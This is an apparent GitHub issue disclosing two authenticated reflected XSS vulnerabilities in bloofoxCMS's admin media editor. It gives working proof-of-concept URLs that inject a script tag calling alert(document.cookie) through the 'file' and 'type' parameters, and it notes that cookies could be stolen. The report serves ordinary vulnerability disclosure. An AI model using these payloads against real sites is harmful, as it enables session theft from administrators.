Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

'Multiple' Cross-Site Scripting (XSS) (Authenticated) #12

Open
able403 opened this issue Dec 1, 2021 · 0 comments
Open

'Multiple' Cross-Site Scripting (XSS) (Authenticated) #12

able403 opened this issue Dec 1, 2021 · 0 comments

Comments

@able403
Copy link

able403 commented Dec 1, 2021

I found two Authenticated Cross-Site Scripting in 'file' parameter and 'type' parameter

Cross-Site Scripting in the parameter 'file'

http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&type=0

image

Cross-Site Scripting in the parameter 'type'

http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg&type=%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E

image

Impact

The attacker can execute a HTML/JS Code the attacker can stealing cookies

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant